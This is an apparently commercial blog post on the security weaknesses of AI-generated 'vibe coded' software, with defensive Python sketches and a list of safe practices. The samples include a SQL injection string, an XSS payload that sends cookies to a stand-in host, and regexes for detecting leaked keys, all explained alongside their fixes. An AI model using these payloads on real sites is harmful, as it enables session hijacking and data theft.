Are you for or against having an AI write your code? Either way, the movement is here, and it has a name – vibe coding. First coined by Andrej Karpathy, the term has raised a lot of questions about how safe the practice is, especially for non-developers. As enterprises and solo developers alike embrace AI coding assistants, one question becomes critical: how well does AI-generated code hold up to security testing?
Spoiler: not as well as we’d like.
Tools
With platforms like ChatGPT, Cursor, or Replit, users can describe what they want in plain English, and the AI generates the code. This makes coding accessible to a broader audience, turning ideas into prototypes without deep technical skills, and it opens software development to people from all sorts of backgrounds.
As with all tools, though, it all depends on how you use them.
Risks
When used for low-stakes applications where security isn’t a major concern, vibe coding isn’t a threat. For larger, high-stakes applications, though, like crypto and DeFi, it’s not recommended – especially for non-coders.
If the code an AI was trained on is riddled with vulnerabilities, it can replicate those problems. Plus, AI often isn’t up to date on the latest security practices, so it can recommend outdated or dodgy third-party resources.
We’ve compiled some cases below that you might find of interest. So far, AI-generated code has been seen to include:
SQL injections
If a program takes user input and sends it straight to the database, an attacker can include extra commands. Those commands run with the same privileges and let them read, change, or delete data. So SQL injections can slip in whenever your AI assistant builds database queries from unvalidated inputs.
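To make that concrete, here’s a minimal sketch in Python using the standard-library sqlite3 module and a hypothetical users table; the same principle applies to any database driver:

```python
import sqlite3

# Throwaway in-memory database with a hypothetical users table.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE users (name TEXT, email TEXT)")
cur.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_input = "nobody' OR '1'='1"  # attacker-controlled value

# Vulnerable: the input is spliced straight into the SQL string, so the
# OR clause matches every row despite the bogus name.
cur.execute(f"SELECT * FROM users WHERE name = '{user_input}'")
print(cur.fetchall())  # leaks every user

# Safer: a parameterised query treats the input as data, not SQL, so the
# injection attempt is just an odd-looking username that matches nothing.
cur.execute("SELECT * FROM users WHERE name = ?", (user_input,))
print(cur.fetchall())  # no rows
```

Whatever the language, the fix is the same: let the driver bind parameters instead of building SQL strings by hand.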

Hardcoded secrets or keys
Last year, security researcher Bill Demirkapi uncovered over 15,000 hardcoded secrets, including passwords and API keys, in publicly accessible code repositories. AI tools compound the problem: AI-generated code often inadvertently includes sensitive information.
Embedding passwords, API keys, or certificates directly in code means anyone with access to the code can find them and impersonate your application. Hardcoded secrets often creep in because the model can’t differentiate between safe and unsafe key management.
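A minimal sketch of the pattern and one common fix, assuming a hypothetical PAYMENT_API_KEY environment variable:

```python
import os

# Risky: the key ships with the code, appears in every clone of the
# repo, and lingers in version-control history even after deletion.
API_KEY = "sk-live-EXAMPLE-NOT-REAL"  # illustrative placeholder only

# Safer: read it from the environment at runtime, populated by your
# deployment platform, a vault, or a local file kept out of git.
API_KEY = os.environ.get("PAYMENT_API_KEY")
if API_KEY is None:
    raise RuntimeError("PAYMENT_API_KEY is not set")
```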
Lionel Acevado built his SaaS with Cursor, an AI code editor, and touted how great it was on social media. The floodgates opened as the internet took it apart: people exploited unsecured API keys and were able to bypass paywalls. Acevado has since said he will learn to code before building his next SaaS application.
Some AI tools have built-in security checks capable of flagging common vulnerabilities, like SQL injection or hardcoded secrets.
Cross-site scripting (XSS)
A study analysing code snippets generated by AI code generation tools found that a significant portion contained security weaknesses, including XSS vulnerabilities. When a site shows user-provided text on a page without cleaning it first, someone can embed small scripts. Those run in other users’ browsers, letting the attacker steal cookies, hijack sessions, or redirect users. XSS vulnerabilities may occur if your AI tool echoes user data into a page without sanitisation.
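As an illustration, here’s a minimal sketch using Python’s standard-library html.escape; in a real application you’d normally rely on your template engine’s auto-escaping rather than escaping by hand:

```python
from html import escape

# Attacker-controlled input posing as an innocent comment.
comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Vulnerable: the text is dropped into the page unescaped, so the script
# executes in the browser of anyone who views the comment.
unsafe_page = f"<p>{comment}</p>"

# Safer: escaping turns <, >, & and quotes into harmless entities, so
# the payload is displayed as text rather than executed.
safe_page = f"<p>{escape(comment)}</p>"
print(safe_page)
```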
Improper cryptography
The same study also found AI-generated code using ‘broken or risky cryptographic algorithms’. Outdated or home-grown encryption methods can leave data exposed: if the algorithm is weak or implemented incorrectly, attackers can decrypt sensitive information. Improper cryptography comes up when AI suggests outdated or misconfigured encryption routines.
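As one example of the difference, sketched with only Python’s standard library (the iteration count is an illustrative choice, not a universal recommendation):

```python
import hashlib
import os

password = b"correct horse battery staple"

# Risky: unsalted MD5 is fast and broken; precomputed tables and GPU
# brute force make digests like this cheap to reverse.
weak_digest = hashlib.md5(password).hexdigest()

# Stronger: a per-user random salt plus a deliberately slow
# key-derivation function (PBKDF2 here, from the standard library).
salt = os.urandom(16)
strong_digest = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000)
```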
Broken authentication logic
A 2021 study testing the security of AI-generated code contributions (specifically GitHub Copilot) found roughly 40% of the generated samples to be insecure. Among the weaknesses was broken authentication logic, typically the result of improper handling of user credentials and session management.
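Two of the most common failure modes, sketched in Python with simplified placeholders rather than a full authentication system:

```python
import hmac
import secrets

stored_hash = b"\x01" * 32    # placeholder for a salted password hash
supplied_hash = b"\x01" * 32  # placeholder hash from the login attempt

# Broken pattern: predictable session tokens (counters, timestamps, or a
# plain hash of the email) let attackers guess other users' sessions.
bad_session_id = str(hash("user@example.com"))

# Safer: an unguessable, cryptographically random token.
session_id = secrets.token_urlsafe(32)

# Broken pattern: `supplied_hash == stored_hash` can leak timing
# information. Safer: compare secrets in constant time.
ok = hmac.compare_digest(supplied_hash, stored_hash)
```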
More recently, a Solana-related exploit demonstrated the consequences of deploying unverified AI-generated code. In early 2025, a user lost $2,500 after running a ChatGPT-generated code snippet without proper validation: the code included a malicious API link that led to a phishing site.
So What Do You Do?
According to the 2024 Stack Overflow Developer Survey, 76% of respondents are using or plan to use AI tools in their development process, up from 70% the previous year. A 2024 GitHub survey showed that 97% of developers have used AI coding tools at some point.
The tools behind vibe coding are a double-edged sword: it all depends on the context you use them in and how much you understand. These AI code generation tools can still be useful, especially at the idea stage.
Below is a breakdown of safe practices you can follow, whether you’re a developer or just experimenting with AI-generated code.
Human-in-the-Loop Review
Always have a person check the code before using it. AI tools can write functional code, but they don’t fully understand context or security.
Independent Vulnerability Scans
Don’t rely solely on built-in AI tooling. Augment your IDE with external security tools (like GitLab, Checkmarx, or Veracode) to detect issues early, especially ones the AI might miss.
Third-Party Validation
Double-check any external libraries or code snippets suggested by the AI. Just because an AI recommends a package doesn’t mean it’s trustworthy or still maintained.
Automated Testing Pipelines
Integrate static and dynamic analysis tools (SAST/DAST) into your CI/CD pipelines. These add a layer of automated checks that can catch vulnerabilities across every branch.
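As one small example, assuming a Python codebase and the open-source SAST tool Bandit, a CI step can be as simple as a script that fails the build when the scan reports findings:

```python
import subprocess
import sys

# Run Bandit recursively over the source tree. Bandit exits non-zero
# when it reports findings, so propagating its return code fails the
# CI job and blocks the merge.
result = subprocess.run(["bandit", "-r", "src/"])
sys.exit(result.returncode)
```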
Secrets Management
Enforce policies to prevent hardcoded secrets. Use vaults, environment variables, and secrets management platforms to keep keys and credentials secure.
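Enforcement can be automated too. Here’s a minimal sketch of a pre-commit-style scan with two illustrative patterns; dedicated scanners such as gitleaks or truffleHog ship far more comprehensive rule sets:

```python
import pathlib
import re
import sys

# Illustrative patterns only: AWS access key IDs and the hypothetical
# payment-key placeholder format used earlier in this article.
PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"sk-live-[0-9A-Za-z-]{8,}"),
]

findings = []
for path in pathlib.Path("src").rglob("*.py"):
    text = path.read_text(errors="ignore")
    for pattern in PATTERNS:
        if pattern.search(text):
            findings.append(f"{path}: matches {pattern.pattern}")

if findings:
    print("\n".join(findings))
    sys.exit(1)  # a non-zero exit blocks the commit or build
```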
Ongoing Training
Upskill your team. Understanding how AI generates code—and where it might go wrong—empowers developers to catch and correct issues proactively.
Layered Defence
No single method will catch everything. Combine AI tools, human oversight, and automated testing to build a layered approach to secure development.
By embedding these practices, developers and experimenters alike can use AI-generated code far more safely.

How We Can Help
At our agency, we combine the speed of AI with the reliability of expert review—so you get the best of both worlds. Whether you’re exploring an idea, building a proof of concept, or deploying a secure application, we can support you at every stage.
We don’t officially offer AI code auditing as a service yet. But we know how fast things are changing, and it can be hard to feel confident about what’s secure or reliable.
If you are trying out AI tools or thinking about using them in your project, we are here to help.
Whether you want a second opinion on some AI-generated code, help navigating security concerns, or just someone to talk through your options with, feel free to get in touch.